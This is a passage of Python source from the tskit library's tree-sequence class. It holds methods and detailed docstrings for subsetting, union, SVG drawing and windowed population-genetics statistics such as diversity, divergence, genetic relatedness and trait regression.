:meth:`.simplify` for retaining the ancestry of a subset of nodes.
:param list nodes: The list of nodes for which to retain information. This
may be a numpy array (or array-like) object (dtype=np.int32).
:param bool record_provenance: Whether to record a provenance entry
in the provenance table for this operation.
:param bool reorder_populations: Whether to reorder populations
(default: True). If False, the population table will not be altered in
any way.
:param bool remove_unreferenced: Whether sites, individuals, and populations
that are not referred to by any retained entries in the tables should
be removed (default: True). See the description for details.
:rtype: .TreeSequence
"""
tables = self.dump_tables()
tables.subset(
nodes,
record_provenance=record_provenance,
reorder_populations=reorder_populations,
remove_unreferenced=remove_unreferenced,
)
return tables.tree_sequence()
def union(
self,
other,
node_mapping,
check_shared_equality=True,
add_populations=True,
record_provenance=True,
):
"""
Returns an expanded tree sequence which contains the node-wise union of
``self`` and ``other``, obtained by adding the non-shared portions of
``other`` onto ``self``. The "shared" portions are specified using a
map that specifies which nodes in ``other`` are equivalent to those in
``self``: the ``node_mapping`` argument should be an array of length
equal to the number of nodes in ``other`` and whose entries are the ID
of the matching node in ``self``, or ``tskit.NULL`` if there is no
matching node. Those nodes in ``other`` that map to ``tskit.NULL`` will
be added to ``self``, along with:
1. Individuals whose nodes are new to ``self``.
2. Edges whose parent or child are new to ``self``.
3. Mutations whose nodes are new to ``self``.
4. Sites which were not present in ``self``, if the site contains a newly
added mutation.
By default, populations of newly added nodes are assumed to be new
populations, and added to the population table as well.
Note that this operation also sorts the resulting tables, so the
resulting tree sequence may not be equal to ``self`` even if nothing
new was added (although it would differ only in ordering of the tables).
:param TableCollection other: Another table collection.
:param list node_mapping: An array of node IDs that relate nodes in
``other`` to nodes in ``self``.
:param bool check_shared_equality: If True, the shared portions of the
tree sequences will be checked for equality. It does so by
subsetting both ``self`` and ``other`` on the equivalent nodes
specified in ``node_mapping``, and then checking for equality of
the subsets.
:param bool add_populations: If True, nodes new to ``self`` will be
assigned new population IDs.
:param bool record_provenance: Whether to record a provenance entry
in the provenance table for this operation.
"""
tables = self.dump_tables()
other_tables = other.dump_tables()
tables.union(
other_tables,
node_mapping,
check_shared_equality=check_shared_equality,
add_populations=add_populations,
record_provenance=record_provenance,
)
return tables.tree_sequence()
def draw_svg(
self,
path=None,
*,
size=None,
x_scale=None,
tree_height_scale=None,
node_labels=None,
mutation_labels=None,
root_svg_attributes=None,
style=None,
order=None,
force_root_branch=None,
symbol_size=None,
x_axis=None,
x_label=None,
x_lim=None,
y_axis=None,
y_label=None,
y_ticks=None,
y_gridlines=None,
**kwargs,
):
"""
Return an SVG representation of a tree sequence.
When working in a Jupyter notebook, use the ``IPython.display.SVG`` function
to display the SVG output from this function inline in the notebook::
>>> SVG(tree.draw_svg())
The visual elements in the svg are
`grouped <https://www.w3.org/TR/SVG2/struct.html#Groups>`_
for easy styling and manipulation. The entire visualization with trees and X
axis is contained within a group of class ``tree-sequence``. Each tree in
the displayed tree sequence is contained in a group of class ``tree``, as
described in :meth:`Tree.draw_svg`, so that visual elements pertaining to one
or more trees targetted as documented in that method. For instance, the
following style will change the colour of all the edges of the *initial*
tree in the sequence and hide the non-sample node labels in *all* the trees
.. code-block:: css
.tree.t0 .edge {stroke: blue}
.tree .node:not(.sample) > text {visibility: hidden}
See :meth:`Tree.draw_svg` for further details.
:param str path: The path to the file to write the output. If None, do not write
to file.
:param size: A tuple of (width, height) giving the width and height of the
produced SVG drawing in abstract user units (usually interpreted as pixels on
display).
:type size: tuple(int, int)
:param str x_scale: Control how the X axis is drawn. If "physical" (the default)
the axis scales linearly with physical distance along the sequence,
background shading is used to indicate the position of the trees along the
X axis, and sites (with associated mutations) are marked at the
appropriate physical position on axis line. If "treewise", each axis tick
corresponds to a tree boundary, which are positioned evenly along the axis,
so that the X axis is of variable scale, no background scaling is required,
and site positions are not marked on the axis.
:param str tree_height_scale: Control how height values for nodes are computed.
If this is equal to ``"time"``, node heights are proportional to their time
values (this is the default). If this is equal to ``"log_time"``, node
heights are proportional to their log(time) values. If it is equal to
``"rank"``, node heights are spaced equally according to their ranked times.
:param node_labels: If specified, show custom labels for the nodes
(specified by ID) that are present in this map; any nodes not present will
not have a label.
:type node_labels: dict(int, str)
:param mutation_labels: If specified, show custom labels for the
mutations (specified by ID) that are present in the map; any mutations
not present will not have a label.
:type mutation_labels: dict(int, str)
:param dict root_svg_attributes: Additional attributes, such as an id, that will
be embedded in the root ``<svg>`` tag of the generated drawing.
:param str style: A `css string <https://www.w3.org/TR/CSS21/syndata.htm>`_
that will be included in the ``<style>`` tag of the generated svg.
:param str order: A string specifying the traversal type used to order the tips
in each tree, as detailed in :meth:`Tree.nodes`. If None (default), use
the default order as described in that method.
:param bool force_root_branch: If ``True`` plot a branch (edge) above every tree
root in the tree sequence. If ``None`` (default) then only plot such
root branches if any root in the tree sequence has a mutation above it.
:param float symbol_size: Change the default size of the node and mutation
plotting symbols. If ``None`` (default) use a standard size.
:param bool x_axis: Should the plot have an X axis line, showing the positions
of trees along the genome. The scale used is determined by the ``x_scale``
parameter. If ``None`` (default) plot an X axis.
:param str x_label: Place a label under the plot. If ``None`` (default) and
there is an X axis, create and place an appropriate label.
:param list x_lim: A list of size two giving the genomic positions between which
trees should be plotted. If the first is ``None``, then plot from the first
non-empty region of the tree sequence. If the second is ``None``, then plot
up to the end of the last non-empty region of the tree sequence. The default
value ``x_lim=None`` is shorthand for the list [``None``, ``None``]. If
numerical values are given, then regions outside the interval have all
information discarded: this means that mutations outside the interval will
not be shown. To force display of the entire tree sequence, including empty
flanking regions, specify ``x_lim=[0, ts.sequence_length]``.
:param bool y_axis: Should the plot have an Y axis line, showing time (or
ranked node time if ``tree_height_scale="rank"``. If ``None`` (default)
do not plot a Y axis.
:param str y_label: Place a label to the left of the plot. If ``None`` (default)
and there is a Y axis, create and place an appropriate label.
:param list y_ticks: A list of Y values at which to plot tickmarks (``[]``
gives no tickmarks). If ``None``, plot one tickmark for each unique
node value.
:param bool y_gridlines: Whether to plot horizontal lines behind the tree
at each y tickmark.
:return: An SVG representation of a tree sequence.
:rtype: str
.. note::
Technically, x_lim[0] specifies a *minimum* value for the start of the X
axis, and x_lim[1] specifies a *maximum* value for the end. This is only
relevant if the tree sequence contains "empty" regions with no edges or
mutations. In this case if x_lim[0] lies strictly within an empty region
(i.e. ``empty_tree.interval.left < x_lim[0] < empty_tree.interval.right``)
then that tree will not be plotted on the left hand side, and the X axis
will start at ``empty_tree.interval.right``. Similarly, if x_lim[1] lies
strictly within an empty region then that tree will not be plotted on the
right hand side, and the X axis will end at ``empty_tree.interval.left``
"""
draw = drawing.SvgTreeSequence(
self,
size,
x_scale=x_scale,
tree_height_scale=tree_height_scale,
node_labels=node_labels,
mutation_labels=mutation_labels,
root_svg_attributes=root_svg_attributes,
style=style,
order=order,
force_root_branch=force_root_branch,
symbol_size=symbol_size,
x_axis=x_axis,
x_label=x_label,
x_lim=x_lim,
y_axis=y_axis,
y_label=y_label,
y_ticks=y_ticks,
y_gridlines=y_gridlines,
**kwargs,
)
output = draw.drawing.tostring()
if path is not None:
# TODO remove the 'pretty' when we are done debugging this.
draw.drawing.saveas(path, pretty=True)
return output
def draw_text(self, **kwargs):
# TODO document this method.
return str(drawing.TextTreeSequence(self, **kwargs))
############################################
#
# Statistics computation
#
############################################
def general_stat(
self,
W,
f,
output_dim,
windows=None,
polarised=False,
mode=None,
span_normalise=True,
strict=True,
):
"""
Compute a windowed statistic from weights and a summary function.
See the :ref:`statistics interface <sec_stats_interface>` section for details on
:ref:`windows <sec_stats_windows>`,
:ref:`mode <sec_stats_mode>`,
:ref:`span normalise <sec_stats_span_normalise>`,
and :ref:`return value <sec_stats_output_format>`.
On each tree, this
propagates the weights ``W`` up the tree, so that the "weight" of each
node is the sum of the weights of all samples at or below the node.
Then the summary function ``f`` is applied to the weights, giving a
summary for each node in each tree. How this is then aggregated depends
on ``mode``:
"site"
Adds together the total summary value across all alleles in each window.
"branch"
Adds together the summary value for each node, multiplied by the
length of the branch above the node and the span of the tree.
"node"
Returns each node's summary value added across trees and multiplied
by the span of the tree.
Both the weights and the summary can be multidimensional: if ``W`` has ``k``
columns, and ``f`` takes a ``k``-vector and returns an ``m``-vector,
then the output will be ``m``-dimensional for each node or window (depending
on "mode").
.. note::
The summary function ``f`` should return zero when given both 0 and
the total weight (i.e., ``f(0) = 0`` and ``f(np.sum(W, axis=0)) = 0``),
unless ``strict=False``. This is necessary for the statistic to be
unaffected by parts of the tree sequence ancestral to none or all
of the samples, respectively.
:param numpy.ndarray W: An array of values with one row for each sample and one
column for each weight.
:param f: A function that takes a one-dimensional array of length
equal to the number of columns of ``W`` and returns a one-dimensional
array.
:param int output_dim: The length of ``f``'s return value.
:param list windows: An increasing list of breakpoints between the windows
to compute the statistic in.
:param bool polarised: Whether to leave the ancestral state out of computations:
see :ref:`sec_stats` for more details.
:param str mode: A string giving the "type" of the statistic to be computed
(defaults to "site").
:param bool span_normalise: Whether to divide the result by the span of the
window (defaults to True).
:param bool strict: Whether to check that f(0) and f(total weight) are zero.
:return: A ndarray with shape equal to (num windows, num statistics).
"""
if mode is None:
mode = "site"
if strict:
total_weights = np.sum(W, axis=0)
for x in [total_weights, total_weights * 0.0]:
with np.errstate(invalid="ignore", divide="ignore"):
fx = np.array(f(x))
fx[np.isnan(fx)] = 0.0
if not np.allclose(fx, np.zeros((output_dim,))):
raise ValueError(
"Summary function does not return zero for both "
"zero weight and total weight."
)
return self.__run_windowed_stat(
windows,
self.ll_tree_sequence.general_stat,
W,
f,
output_dim,
polarised=polarised,
span_normalise=span_normalise,
mode=mode,
)
def sample_count_stat(
self,
sample_sets,
f,
output_dim,
windows=None,
polarised=False,
mode=None,
span_normalise=True,
strict=True,
):
"""
Compute a windowed statistic from sample counts and a summary function.
This is a wrapper around :meth:`.general_stat` for the common case in
which the weights are all either 1 or 0, i.e., functions of the joint
allele frequency spectrum.
See the :ref:`statistics interface <sec_stats_interface>` section for details on
:ref:`sample sets <sec_stats_sample_sets>`,
:ref:`windows <sec_stats_windows>`,
:ref:`mode <sec_stats_mode>`,
:ref:`span normalise <sec_stats_span_normalise>`,
and :ref:`return value <sec_stats_output_format>`.
If ``sample_sets`` is a list of ``k`` sets of samples, then
``f`` should be a function that takes an argument of length ``k`` and
returns a one-dimensional array. The ``j``-th element of the argument
to ``f`` will be the number of samples in ``sample_sets[j]`` that lie
below the node that ``f`` is being evaluated for. See
:meth:`.general_stat` for more details.
Here is a contrived example: suppose that ``A`` and ``B`` are two sets
of samples with ``nA`` and ``nB`` elements, respectively. Passing these
as sample sets will give ``f`` an argument of length two, giving the number
of samples in ``A`` and ``B`` below the node in question. So, if we define
.. code-block:: python
def f(x):
pA = x[0] / nA
pB = x[1] / nB
return np.array([pA * pB])
then if all sites are biallelic,
.. code-block:: python
ts.sample_count_stat([A, B], f, 1, windows="sites", polarised=False, mode="site")
would compute, for each site, the product of the derived allele
frequencies in the two sample sets, in a (num sites, 1) array. If
instead ``f`` returns ``np.array([pA, pB, pA * pB])``, then the
output would be a (num sites, 3) array, with the first two columns
giving the allele frequencies in ``A`` and ``B``, respectively.
.. note::
The summary function ``f`` should return zero when given both 0 and
the sample size (i.e., ``f(0) = 0`` and
``f(np.array([len(x) for x in sample_sets])) = 0``). This is
necessary for the statistic to be unaffected by parts of the tree
sequence ancestral to none or all of the samples, respectively.
:param list sample_sets: A list of lists of Node IDs, specifying the
groups of nodes to compute the statistic with.
:param f: A function that takes a one-dimensional array of length
equal to the number of sample sets and returns a one-dimensional array.
:param int output_dim: The length of ``f``'s return value.
:param list windows: An increasing list of breakpoints between the windows
to compute the statistic in.
:param bool polarised: Whether to leave the ancestral state out of computations:
see :ref:`sec_stats` for more details.
:param str mode: A string giving the "type" of the statistic to be computed
(defaults to "site").
:param bool span_normalise: Whether to divide the result by the span of the
window (defaults to True).
:param bool strict: Whether to check that f(0) and f(total weight) are zero.
:return: A ndarray with shape equal to (num windows, num statistics).
""" # noqa: B950
# helper function for common case where weights are indicators of sample sets
for U in sample_sets:
if len(U) != len(set(U)):
raise ValueError(
"Elements of sample_sets must be lists without repeated elements."
)
if len(U) == 0:
raise ValueError("Elements of sample_sets cannot be empty.")
for u in U:
if not self.node(u).is_sample():
raise ValueError("Not all elements of sample_sets are samples.")
W = np.array([[float(u in A) for A in sample_sets] for u in self.samples()])
return self.general_stat(
W,
f,
output_dim,
windows=windows,
polarised=polarised,
mode=mode,
span_normalise=span_normalise,
strict=strict,
)
def parse_windows(self, windows):
# Note: need to make sure windows is a string or we try to compare the
# target with a numpy array elementwise.
if windows is None:
windows = [0.0, self.sequence_length]
elif isinstance(windows, str):
if windows == "trees":
windows = self.breakpoints(as_array=True)
elif windows == "sites":
# breakpoints are at 0.0 and at the sites and at the end
windows = np.concatenate(
[
[] if self.num_sites > 0 else [0.0],
self.tables.sites.position,
[self.sequence_length],
]
)
windows[0] = 0.0
else:
raise ValueError(
f"Unrecognized window specification {windows}:",
"the only allowed strings are 'sites' or 'trees'",
)
return np.array(windows)
def __run_windowed_stat(self, windows, method, *args, **kwargs):
strip_dim = windows is None
windows = self.parse_windows(windows)
stat = method(*args, **kwargs, windows=windows)
if strip_dim:
stat = stat[0]
return stat
def __one_way_sample_set_stat(
self,
ll_method,
sample_sets,
windows=None,
mode=None,
span_normalise=True,
polarised=False,
):
if sample_sets is None:
sample_sets = self.samples()
# First try to convert to a 1D numpy array. If it is, then we strip off
# the corresponding dimension from the output.
drop_dimension = False
try:
sample_sets = np.array(sample_sets, dtype=np.int32)
except ValueError:
pass
else:
# If we've successfully converted sample_sets to a 1D numpy array
# of integers then drop the dimension
if len(sample_sets.shape) == 1:
sample_sets = [sample_sets]
drop_dimension = True
sample_set_sizes = np.array(
[len(sample_set) for sample_set in sample_sets], dtype=np.uint32
)
if np.any(sample_set_sizes == 0):
raise ValueError("Sample sets must contain at least one element")
flattened = util.safe_np_int_cast(np.hstack(sample_sets), np.int32)
stat = self.__run_windowed_stat(
windows,
ll_method,
sample_set_sizes,
flattened,
mode=mode,
span_normalise=span_normalise,
polarised=polarised,
)
if drop_dimension:
stat = stat.reshape(stat.shape[:-1])
return stat
def __k_way_sample_set_stat(
self,
ll_method,
k,
sample_sets,
indexes=None,
windows=None,
mode=None,
span_normalise=True,
polarised=False,
):
sample_set_sizes = np.array(
[len(sample_set) for sample_set in sample_sets], dtype=np.uint32
)
if np.any(sample_set_sizes == 0):
raise ValueError("Sample sets must contain at least one element")
flattened = util.safe_np_int_cast(np.hstack(sample_sets), np.int32)
if indexes is None:
if len(sample_sets) != k:
raise ValueError(
"Must specify indexes if there are not exactly {} sample "
"sets.".format(k)
)
indexes = np.arange(k, dtype=np.int32)
drop_dimension = False
indexes = util.safe_np_int_cast(indexes, np.int32)
if len(indexes.shape) == 1:
indexes = indexes.reshape((1, indexes.shape[0]))
drop_dimension = True
if len(indexes.shape) != 2 or indexes.shape[1] != k:
raise ValueError(
"Indexes must be convertable to a 2D numpy array with {} "
"columns".format(k)
)
stat = self.__run_windowed_stat(
windows,
ll_method,
sample_set_sizes,
flattened,
indexes,
mode=mode,
span_normalise=span_normalise,
polarised=polarised,
)
if drop_dimension:
stat = stat.reshape(stat.shape[:-1])
return stat
############################################
# Statistics definitions
############################################
def diversity(
self, sample_sets=None, windows=None, mode="site", span_normalise=True
):
"""
Computes mean genetic diversity (also knowns as "Tajima's pi") in each of the
sets of nodes from ``sample_sets``.
Please see the :ref:`one-way statistics <sec_stats_sample_sets_one_way>`
section for details on how the ``sample_sets`` argument is interpreted
and how it interacts with the dimensions of the output array.
See the :ref:`statistics interface <sec_stats_interface>` section for details on
:ref:`windows <sec_stats_windows>`,
:ref:`mode <sec_stats_mode>`,
:ref:`span normalise <sec_stats_span_normalise>`,
and :ref:`return value <sec_stats_output_format>`.
Note that this quantity can also be computed by the
:meth:`divergence <.TreeSequence.divergence>` method.
What is computed depends on ``mode``:
"site"
Mean pairwise genetic diversity: the average across distinct,
randomly chosen pairs of chromosomes, of the density of sites at
which the two carry different alleles, per unit of chromosome length.
"branch"
Mean distance in the tree: the average across distinct, randomly chosen pairs
of chromsomes and locations in the window, of the mean distance in the tree
between the two samples (in units of time).
"node"
For each node, the proportion of genome on which the node is an ancestor to
only one of a random pair from the sample set, averaged over choices of pair.
:param list sample_sets: A list of lists of Node IDs, specifying the
groups of nodes to compute the statistic with.
:param list windows: An increasing list of breakpoints between the windows
to compute the statistic in.
:param str mode: A string giving the "type" of the statistic to be computed
(defaults to "site").
:param bool span_normalise: Whether to divide the result by the span of the
window (defaults to True).
:return: A numpy array.
"""
return self.__one_way_sample_set_stat(
self._ll_tree_sequence.diversity,
sample_sets,
windows=windows,
mode=mode,
span_normalise=span_normalise,
)
def divergence(
self, sample_sets, indexes=None, windows=None, mode="site", span_normalise=True
):
"""
Computes mean genetic divergence between (and within) pairs of
sets of nodes from ``sample_sets``.
Operates on ``k = 2`` sample sets at a time; please see the
:ref:`multi-way statistics <sec_stats_sample_sets_multi_way>`
section for details on how the ``sample_sets`` and ``indexes`` arguments are
interpreted and how they interact with the dimensions of the output array.
See the :ref:`statistics interface <sec_stats_interface>` section for details on
:ref:`windows <sec_stats_windows>`,
:ref:`mode <sec_stats_mode>`,
:ref:`span normalise <sec_stats_span_normalise>`,
and :ref:`return value <sec_stats_output_format>`.
As a special case, an index ``(j, j)`` will compute the
:meth:`diversity <.TreeSequence.diversity>` of ``sample_set[j]``.
What is computed depends on ``mode``:
"site"
Mean pairwise genetic divergence: the average across distinct,
randomly chosen pairs of chromosomes (one from each sample set), of
the density of sites at which the two carry different alleles, per
unit of chromosome length.
"branch"
Mean distance in the tree: the average across distinct, randomly
chosen pairs of chromsomes (one from each sample set) and locations
in the window, of the mean distance in the tree between the two
samples (in units of time).
"node"
For each node, the proportion of genome on which the node is an ancestor to
only one of a random pair (one from each sample set), averaged over
choices of pair.
:param list sample_sets: A list of lists of Node IDs, specifying the
groups of nodes to compute the statistic with.
:param list indexes: A list of 2-tuples, or None.
:param list windows: An increasing list of breakpoints between the windows
to compute the statistic in.
:param str mode: A string giving the "type" of the statistic to be computed
(defaults to "site").
:param bool span_normalise: Whether to divide the result by the span of the
window (defaults to True).
:return: A ndarray with shape equal to (num windows, num statistics).
"""
return self.__k_way_sample_set_stat(
self._ll_tree_sequence.divergence,
2,
sample_sets,
indexes=indexes,
windows=windows,
mode=mode,
span_normalise=span_normalise,
)
# JK: commenting this out for now to get the other methods well tested.
# Issue: https://github.com/tskit-dev/tskit/issues/201
# def divergence_matrix(self, sample_sets, windows=None, mode="site"):
# """
# Finds the mean divergence between pairs of samples from each set of
# samples and in each window. Returns a numpy array indexed by (window,
# sample_set, sample_set). Diagonal entries are corrected so that the
# value gives the mean divergence for *distinct* samples, but it is not
# checked whether the sample_sets are disjoint (so offdiagonals are not
# corrected). For this reason, if an element of `sample_sets` has only
# one element, the corresponding diagonal will be NaN.
# The mean divergence between two samples is defined to be the mean: (as
# a TreeStat) length of all edges separating them in the tree, or (as a
# SiteStat) density of segregating sites, at a uniformly chosen position
# on the genome.
# :param list sample_sets: A list of sets of IDs of samples.
# :param iterable windows: The breakpoints of the windows (including start
# and end, so has one more entry than number of windows).
# :return: A list of the upper triangle of mean TMRCA values in row-major
# order, including the diagonal.
# """
# ns = len(sample_sets)
# indexes = [(i, j) for i in range(ns) for j in range(i, ns)]
# x = self.divergence(sample_sets, indexes, windows, mode=mode)
# nw = len(windows) - 1
# A = np.ones((nw, ns, ns), dtype=float)
# for w in range(nw):
# k = 0
# for i in range(ns):
# for j in range(i, ns):
# A[w, i, j] = A[w, j, i] = x[w][k]
# k += 1
# return A
def genetic_relatedness(
self,
sample_sets,
indexes=None,
windows=None,
mode="site",
span_normalise=True,
polarised=False,
proportion=True,
):
"""
Computes genetic relatedness between (and within) pairs of
sets of nodes from ``sample_sets``.
Operates on ``k = 2`` sample sets at a time; please see the
:ref:`multi-way statistics <sec_stats_sample_sets_multi_way>`
section for details on how the ``sample_sets`` and ``indexes`` arguments are
interpreted and how they interact with the dimensions of the output array.
See the :ref:`statistics interface <sec_stats_interface>` section for details on
:ref:`windows <sec_stats_windows>`,
:ref:`mode <sec_stats_mode>`,
:ref:`span normalise <sec_stats_span_normalise>`,
:ref:`polarised <sec_stats_polarisation>`,
and :ref:`return value <sec_stats_output_format>`.
What is computed depends on ``mode``:
"site"
Number of pairwise allelic matches in the window between two
sample sets relative to the rest of the sample sets. To be precise,
let `m(u,v)` denote the total number of alleles shared between
nodes `u` and `v`, and let `m(I,J)` be the sum of `m(u,v)` over all
nodes `u` in sample set `I` and `v` in sample set `J`. Let `S` and
`T` be independently chosen sample sets. Then, for sample sets `I`
and `J`, this computes `E[m(I,J) - m(I,S) - m(J,T) + m(S,T)]`.
This can also be seen as the covariance of a quantitative trait
determined by additive contributions from the genomes in each
sample set. Let each allele be associated with an effect drawn from
a `N(0,1/2)` distribution, and let the trait value of a sample set
be the sum of its allele effects. Then, this computes the covariance
between the trait values of two sample sets. For example, to
compute covariance between the traits of diploid individuals, each
sample set would be the pair of genomes of each individual; if
``proportion=True``, this then corresponds to :math:`K_{c0}` in
`Speed & Balding (2014) <https://www.nature.com/articles/nrg3821>`_.
"branch"
Total area of branches in the window ancestral to pairs of samples
in two sample sets relative to the rest of the sample sets. To be
precise, let `B(u,v)` denote the total area of all branches
ancestral to nodes `u` and `v`, and let `B(I,J)` be the sum of
`B(u,v)` over all nodes `u` in sample set `I` and `v` in sample set
`J`. Let `S` and `T` be two independently chosen sample sets. Then
for sample sets `I` and `J`, this computes
`E[B(I,J) - B(I,S) - B(J,T) + B(S,T)]`.
"node"
For each node, the proportion of the window over which pairs of
samples in two sample sets are descendants, relative to the rest of
the sample sets. To be precise, for each node `n`, let `N(u,v)`
denote the proportion of the window over which samples `u` and `v`
are descendants of `n`, and let and let `N(I,J)` be the sum of
`N(u,v)` over all nodes `u` in sample set `I` and `v` in sample set
`J`. Let `S` and `T` be two independently chosen sample sets. Then
for sample sets `I` and `J`, this computes
`E[N(I,J) - N(I,S) - N(J,T) + N(S,T)]`.
:param list sample_sets: A list of lists of Node IDs, specifying the
groups of nodes to compute the statistic with.
:param list indexes: A list of 2-tuples, or None.
:param list windows: An increasing list of breakpoints between the windows
to compute the statistic in.
:param str mode: A string giving the "type" of the statistic to be computed
(defaults to "site").
:param bool span_normalise: Whether to divide the result by the span of the
window (defaults to True).
:param bool proportion: Whether to divide the result by
:meth:`.segregating_sites`, called with the same ``windows`` and
``mode`` (defaults to True). Note that this counts sites
that are segregating between *any* of the samples of *any* of the
sample sets (rather than segregating between all of the samples of
the tree sequence).
:return: A ndarray with shape equal to (num windows, num statistics).
"""
if proportion:
# TODO this should be done in C also
all_samples = list({u for s in sample_sets for u in s})
denominator = self.segregating_sites(
sample_sets=[all_samples],
windows=windows,
mode=mode,
span_normalise=span_normalise,
)
else:
denominator = 1
numerator = self.__k_way_sample_set_stat(
self._ll_tree_sequence.genetic_relatedness,
2,
sample_sets,
indexes=indexes,
windows=windows,
mode=mode,
span_normalise=span_normalise,
polarised=polarised,
)
with np.errstate(divide="ignore", invalid="ignore"):
out = numerator / denominator
return out
def trait_covariance(self, W, windows=None, mode="site", span_normalise=True):
"""
Computes the mean squared covariances between each of the columns of ``W``
(the "phenotypes") and inheritance along the tree sequence.
See the :ref:`statistics interface <sec_stats_interface>` section for details on
:ref:`windows <sec_stats_windows>`,
:ref:`mode <sec_stats_mode>`,
:ref:`span normalise <sec_stats_span_normalise>`,
and :ref:`return value <sec_stats_output_format>`.
Operates on all samples in the tree sequence.
Concretely, if `g` is a binary vector that indicates inheritance from an allele,
branch, or node and `w` is a column of W, normalised to have mean zero,
then the covariance of `g` and `w` is :math:`\\sum_i g_i w_i`, the sum of the
weights corresponding to entries of `g` that are `1`. Since weights sum to
zero, this is also equal to the sum of weights whose entries of `g` are 0.
So, :math:`cov(g,w)^2 = ((\\sum_i g_i w_i)^2 + (\\sum_i (1-g_i) w_i)^2)/2`.
What is computed depends on ``mode``:
"site"
The sum of squared covariances between presence/absence of each allele and
phenotypes, divided by length of the window (if ``span_normalise=True``).
This is computed as sum_a (sum(w[a])^2 / 2), where
w is a column of W with the average subtracted off,
and w[a] is the sum of all entries of w corresponding to samples
carrying allele "a", and the first sum is over all alleles.
"branch"
The sum of squared covariances between the split induced by each branch and
phenotypes, multiplied by branch length, averaged across trees in
the window. This is computed as above: a branch with total weight
w[b] below b contributes (branch length) * w[b]^2 to the total
value for a tree. (Since the sum of w is zero, the total weight
below b and not below b are equal, canceling the factor of 2
above.)
"node"
For each node, the squared covariance between the property of
inheriting from this node and phenotypes, computed as in "branch".
:param numpy.ndarray W: An array of values with one row for each sample and one
column for each "phenotype".
:param list windows: An increasing list of breakpoints between the windows
to compute the statistic in.
:param str mode: A string giving the "type" of the statistic to be computed
(defaults to "site").
:param bool span_normalise: Whether to divide the result by the span of the
window (defaults to True).
:return: A ndarray with shape equal to (num windows, num statistics).
"""
if W.shape[0] != self.num_samples:
raise ValueError(
"First trait dimension must be equal to number of samples."
)
return self.__run_windowed_stat(
windows,
self._ll_tree_sequence.trait_covariance,
W,
mode=mode,
span_normalise=span_normalise,
)
def trait_correlation(self, W, windows=None, mode="site", span_normalise=True):
"""
Computes the mean squared correlations between each of the columns of ``W``
(the "phenotypes") and inheritance along the tree sequence.
See the :ref:`statistics interface <sec_stats_interface>` section for details on
:ref:`windows <sec_stats_windows>`,
:ref:`mode <sec_stats_mode>`,
:ref:`span normalise <sec_stats_span_normalise>`,
and :ref:`return value <sec_stats_output_format>`.
Operates on all samples in the tree sequence.
This is computed as squared covariance in
:meth:`trait_covariance <.TreeSequence.trait_covariance>`,
but divided by :math:`p (1-p)`, where `p` is the proportion of samples
inheriting from the allele, branch, or node in question.
What is computed depends on ``mode``:
"site"
The sum of squared correlations between presence/absence of each allele and
phenotypes, divided by length of the window (if ``span_normalise=True``).
This is computed as the
:meth:`trait_covariance <.TreeSequence.trait_covariance>`
divided by the variance of the relevant column of W
and by ;math:`p * (1 - p)`, where :math:`p` is the allele frequency.
"branch"
The sum of squared correlations between the split induced by each branch and
phenotypes, multiplied by branch length, averaged across trees in
the window. This is computed as the
:meth:`trait_covariance <.TreeSequence.trait_covariance>`,
divided by the variance of the column of w
and by :math:`p * (1 - p)`, where :math:`p` is the proportion of
the samples lying below the branch.
"node"
For each node, the squared correlation between the property of
inheriting from this node and phenotypes, computed as in "branch".
Note that above we divide by the **sample** variance, which for a
vector x of length n is ``np.var(x) * n / (n-1)``.
:param numpy.ndarray W: An array of values with one row for each sample and one
column for each "phenotype". Each column must have positive standard
deviation.
:param list windows: An increasing list of breakpoints between the windows
to compute the statistic in.
:param str mode: A string giving the "type" of the statistic to be computed
(defaults to "site").
:param bool span_normalise: Whether to divide the result by the span of the
window (defaults to True).
:return: A ndarray with shape equal to (num windows, num statistics).
"""
if W.shape[0] != self.num_samples:
raise ValueError(
"First trait dimension must be equal to number of samples."
)
sds = np.std(W, axis=0)
if np.any(sds == 0):
raise ValueError(
"Weight columns must have positive variance", "to compute correlation."
)
return self.__run_windowed_stat(
windows,
self._ll_tree_sequence.trait_correlation,
W,
mode=mode,
span_normalise=span_normalise,
)
def trait_regression(self, *args, **kwargs):
"""
Deprecated synonym for
:meth:`trait_linear_model <.TreeSequence.trait_linear_model>`.
"""
warnings.warn(
"This is deprecated: please use trait_linear_model( ) instead.",
FutureWarning,
)
return self.trait_linear_model(*args, **kwargs)
def trait_linear_model(
self, W, Z=None, windows=None, mode="site", span_normalise=True
):
"""
Finds the relationship between trait and genotype after accounting for
covariates. Concretely, for each trait w (i.e., each column of W),
this does a least-squares fit of the linear model :math:`w \\sim g + Z`,
where :math:`g` is inheritance in the tree sequence (e.g., genotype)
and the columns of :math:`Z` are covariates, and returns the squared
coefficient of :math:`g` in this linear model.
See the :ref:`statistics interface <sec_stats_interface>` section for details on
:ref:`windows <sec_stats_windows>`,
:ref:`mode <sec_stats_mode>`,
:ref:`span normalise <sec_stats_span_normalise>`,
and :ref:`return value <sec_stats_output_format>`.
Operates on all samples in the tree sequence.
To do this, if `g` is a binary vector that indicates inheritance from an allele,
branch, or node and `w` is a column of W, there are :math:`k` columns of
:math:`Z`, and the :math:`k+2`-vector :math:`b` minimises
:math:`\\sum_i (w_i - b_0 - b_1 g_i - b_2 z_{2,i} - ... b_{k+2} z_{k+2,i})^2`
then this returns the number :math:`b_1^2`. If :math:`g` lies in the linear span
of the columns of :math:`Z`, then :math:`b_1` is set to 0. To fit the
linear model without covariates (only the intercept), set `Z = None`.
What is computed depends on ``mode``:
"site"
Computes the sum of :math:`b_1^2/2` for each allele in the window,
as above with :math:`g` indicating presence/absence of the allele,
then divided by the length of the window if ``span_normalise=True``.
(For biallelic loci, this number is the same for both alleles, and so summing
over each cancels the factor of two.)
"branch"
The squared coefficient `b_1^2`, computed for the split induced by each
branch (i.e., with :math:`g` indicating inheritance from that branch),
multiplied by branch length and tree span, summed over all trees
in the window, and divided by the length of the window if
``span_normalise=True``.
"node"
For each node, the squared coefficient `b_1^2`, computed for the property of
inheriting from this node, as in "branch".
:param numpy.ndarray W: An array of values with one row for each sample and one
column for each "phenotype".
:param numpy.ndarray Z: An array of values with one row for each sample and one
column for each "covariate", or `None`. Columns of `Z` must be linearly
independent.
:param list windows: An increasing list of breakpoints between the windows
to compute the statistic in.
:param str mode: A string giving the "type" of the statistic to be computed
(defaults to "site").
:param bool span_normalise: Whether to divide the result by the span of the
window (defaults to True).
:return: A ndarray with shape equal to (num windows, num statistics).
"""
if W.shape[0] != self.num_samples:
raise ValueError(
"First trait dimension must be equal to number of samples."
)
if Z is None:
Z = np.ones((self.num_samples, 1))
else:
tZ = np.column_stack([Z, np.ones((Z.shape[0], 1))])
